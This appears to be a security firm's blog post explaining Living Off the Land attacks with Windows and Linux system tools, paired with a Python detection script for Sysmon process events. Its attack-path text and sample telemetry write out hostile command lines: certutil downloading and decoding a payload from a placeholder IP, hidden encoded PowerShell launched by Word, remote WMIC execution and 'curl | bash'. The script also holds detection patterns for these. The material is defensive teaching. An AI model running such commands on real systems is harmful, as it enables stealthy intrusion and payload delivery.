Pentesting - Living Off the Land
April 30, 2025
Reading time: 7 minutes

At DeepBlue Security & Intelligence, performing penetration tests is one of our core specialties, something we do on a daily basis. Our experienced specialists apply an extensive range of established and new techniques to simulate real-life attacks without being detected. Often successfully: we regularly ask our clients whether they noticed anything unusual during our testing, and more often than not, the answer is no.

A standard technique in our field is the use of existing, legitimate system tools to conduct attacks. This approach, known as "Living Off the Land" (LotL), is common in both red teaming and advanced penetration tests. LotL relies on tools that are natively present in the operating system and signed by its vendor, which makes detection by antivirus and endpoint protection much more difficult than for a dropped executable.

What is Living Off the Land?

Living Off the Land (LotL) is an attack technique in which an attacker or pentester uses already present, trusted system tools to carry out malicious actions. Instead of relying on external malware or exploits, standard components such as command-line utilities, system binaries, and scripts are used to gain access, move laterally, or exfiltrate data. Because these tools are part of the operating system, they often evade signature- and reputation-based detection and prevention mechanisms.

These binaries are commonly referred to as LOLBins (Living Off the Land Binaries); the concept extends to LOLScripts (e.g., PowerShell scripts that ship with Windows) and LOLLibs (e.g., DLLs whose exported functions can be abused). The LOLBAS project maintains a public catalogue of Windows binaries, scripts and libraries with such functions. Using these existing and trusted tools lets attackers and pentesters remain under the radar.

Commonly Used LOLBins:

  • certutil.exe (Windows): Can download files over HTTP(S) (-urlcache -split -f) and encode or decode base64 (-encode/-decode), which lets an attacker fetch a payload and unpack it without touching a browser.
  • powershell.exe: A scripting host with direct access to the .NET framework, commonly used to download and run payloads in memory, often with an encoded (-EncodedCommand) command line.
  • wmic.exe: Queries system information and can create processes on remote hosts (wmic /node:<host> process call create ...). WMIC is deprecated by Microsoft and no longer installed by default in recent Windows 11 releases, but it is still present on most Windows 10 and server estates.
  • rundll32.exe: Loads a DLL and calls one of its exported functions, including attacker-supplied DLLs, and can also run script via javascript: URLs.
  • bash/curl/wget (Linux): Used to fetch payloads from the internet or to run downloaded content directly in a shell (e.g., curl ... | bash).

Why is this technique effective?

Because these tools are standard, signed by the OS vendor and used legitimately in IT management, they are trusted or allowlisted by antivirus software, EDR platforms, and network monitoring systems, so their execution alone is not an indicator; detection has to rely on how they are used. Additionally, LotL techniques are easy to script and can be combined with other methods such as credential dumping or privilege escalation.

A Typical Attack Path:

  1. Initial Access: A user opens a document with a malicious macro, and the Office process spawns PowerShell.
  2. Payload Retrieval: PowerShell or certutil downloads a secondary payload, typically from an attacker-controlled web server.
  3. Command & Control: PowerShell establishes a connection to a C2 server, usually over HTTPS so that it blends in with normal web traffic.
  4. Lateral Movement: WMIC or WinRM is used to run commands on other systems with the credentials already obtained. PsExec is also common here, but it is a Sysinternals tool that has to be dropped on the host, so strictly speaking it is not living off the land.
  5. Exfiltration: Data is compressed, encrypted and sent to an external server using curl or PowerShell.

The Role of a SOC in Detecting LotL Techniques

A well-configured Security Operations Center (SOC) plays a crucial role in detecting LotL-based attacks. Because these techniques rely on legitimate system processes, traditional signature-based detection is often insufficient. A SOC uses behavioral analytics, threat hunting, and advanced log correlation to identify anomalies in how trusted binaries are used.

Examples of SOC capabilities that support LotL detection:

  • Use-case-based detection: Detect unusual usage of tools like rundll32.exe or certutil.exe.
  • Threat intelligence integration: SOCs map behavior to known TTPs (Tactics, Techniques & Procedures) from frameworks like MITRE ATT&CK.
  • Automated alerting via SIEM/EDR: Alerts are triggered when system components are misused in abnormal patterns.
  • Retrospective analysis: A SOC can look back through logs to identify past undetected attack activity.

How to Defend Against LotL Attacks

Detecting and mitigating LotL-based attacks requires a behavior-based approach. Recommended measures include:

  • Command line logging and auditing: Use Sysmon (Windows; Event ID 1 records each process creation with its full command line and parent process) or auditd (Linux; execve rules) to log every command run. On Windows, also enable PowerShell script block logging (Event ID 4104) so that decoded script content is captured.
  • AppLocker or Windows Defender Application Control (WDAC): Restrict which binaries can be executed and, where possible, block the LOLBins that ordinary users have no reason to run (Microsoft's recommended block rules for WDAC cover many of them).
  • SIEM analysis: Create rules to detect abnormal use of certutil.exe, powershell.exe, or wmic.exe, such as certutil with -urlcache, PowerShell with an encoded command line, or WMIC targeting a remote node, and test them against known-good admin activity to keep the false-positive rate down.
  • EDR tuning: Make sure the EDR alerts on behavior (parent/child process chains, script hosts making network connections) rather than only on file hashes, and review its exclusions: an excluded path is a free ride for a LotL attacker.
  • Least privilege model: Prevent users with standard privileges from managing critical systems, and keep administrative tooling on dedicated admin workstations so that LOLBin use from a regular user session stands out.
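The following Python script is an added example (not tooling from the original post or from DeepBlue) of the behavior-based approach described under both the SOC "use-case-based detection" bullet and the "SIEM analysis" bullet above. It runs a handful of constructed Sysmon Event ID 1 style process-creation records through a small rule set that flags the misuse patterns discussed in this article (certutil downloads and decoding, encoded PowerShell, remote WMIC process creation, rundll32 running script, and an Office process spawning a script host) while letting routine admin use of the same binaries pass. The host names, users, IP address, command lines and the ATT&CK technique mapping are all assumptions chosen for the illustration.

```python
"""Behaviour-based LOLBin detection over Sysmon-style process-creation events.

Added illustration for this article, not tooling from the original post.
The events are constructed; field names follow Sysmon Event ID 1 (Image,
CommandLine, ParentImage, User). The rule patterns and the ATT&CK technique
mapping are the editor's own, chosen to match the misuse described above.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Subset of a Sysmon Event ID 1 record (constructed for the example)."""
    host: str
    user: str
    parent_image: str
    image: str
    command_line: str


# Office applications that should not normally spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# (rule name, image basename, regex over CommandLine, ATT&CK technique).
# Ordinary admin use of the same binaries (certutil -verify, local wmic
# queries, running a signed script from PowerShell) does not match these.
RULES = [
    ("certutil_download", "certutil.exe",
     re.compile(r"-urlcache\b.*https?://", re.I), "T1105"),
    ("certutil_decode", "certutil.exe",
     re.compile(r"-decode(hex)?\b", re.I), "T1140"),
    ("powershell_encoded_command", "powershell.exe",
     re.compile(r"(^|\s)-(e|ec|en|enc|encodedcommand)\b", re.I), "T1059.001"),
    ("powershell_download_cradle", "powershell.exe",
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient",
                re.I), "T1105"),
    ("wmic_remote_process_create", "wmic.exe",
     re.compile(r"/node:\S+.*\bprocess\s+call\s+create\b", re.I), "T1047"),
    ("rundll32_script_or_user_path", "rundll32.exe",
     re.compile(r"javascript:|vbscript:|\\Users\\[^\\]+\\AppData\\|\\Temp\\",
                re.I), "T1218.011"),
]


def detect(event):
    """Return a list of (rule, technique) findings for one process event."""
    image = ntpath.basename(event.image).lower()
    parent = ntpath.basename(event.parent_image).lower()
    findings = []
    # Parent/child relationship: a macro launching a script host (step 1 of
    # the attack path) is suspicious regardless of the command line.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(("office_spawns_script_host", "T1204.002"))
    for name, binary, pattern, technique in RULES:
        if image == binary and pattern.search(event.command_line):
            findings.append((name, technique))
    return findings


def scan(events):
    """Group findings per host; hosts without findings are omitted."""
    report = {}
    for event in events:
        hits = detect(event)
        if hits:
            report.setdefault(event.host, []).extend(hits)
    return report


# Constructed telemetry: four steps of the article's attack path on WS01 and
# three routine admin actions on ADM02 that use the same binaries legitimately.
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent("WS01", r"CORP\alice",
                 r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 PS_EXE, "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AA=="),
    ProcessEvent("WS01", r"CORP\alice", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/s2.txt C:\Users\alice\AppData\Local\Temp\s2.txt"),
    ProcessEvent("WS01", r"CORP\alice", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -decode C:\Users\alice\AppData\Local\Temp\s2.txt C:\Users\alice\AppData\Local\Temp\s2.dll"),
    ProcessEvent("WS01", r"CORP\alice", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wmic.exe",
                 r'wmic.exe /node:FS01 process call create "cmd.exe /c whoami > \\FS01\c$\w.txt"'),
    ProcessEvent("ADM02", r"CORP\bob", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify C:\certs\webserver.cer"),
    ProcessEvent("ADM02", r"CORP\bob", r"C:\Windows\explorer.exe", PS_EXE,
                 r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\scripts\rotate-logs.ps1"),
    ProcessEvent("ADM02", r"CORP\bob", r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wmic.exe", "wmic.exe os get caption,version"),
]

if __name__ == "__main__":
    for host, hits in scan(SAMPLE_EVENTS).items():
        print(host, hits)
```

Running it reports five findings on WS01 (the macro-spawned PowerShell, the encoded command line, the certutil download and decode, and the remote WMIC process creation) and nothing on ADM02, even though ADM02 ran certutil, PowerShell and WMIC as well. That is the point of behavior-based detection: the binary is never the signal, the parent process and the arguments are. In a real SIEM these rules would be expressed in its query language and tuned against the organization's own baseline of admin activity.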

So?

Living Off the Land is a powerful, stealthy technique that appears in nearly every professional pentest or attack scenario. For organizations, it’s crucial to understand which standard tools are present in their systems, how they’re used, and how deviations from normal behavior can be detected early.

An active, well-tuned SOC using behavioral analytics and log monitoring is one of the most effective ways to detect these techniques in time. By restricting built-in functionality to only what is necessary and systematically investigating anomalies, you can significantly enhance your cyber defense posture.

Want to know if your organization is vulnerable to LotL techniques? Our pentesters at DeepBlue can perform tailored assessments to evaluate this and provide concrete recommendations.
Would you like to know more about this or any of our other customized services? Contact us at info@deepbluesecurity.nl or call us at +31 (0)70 800 2025.
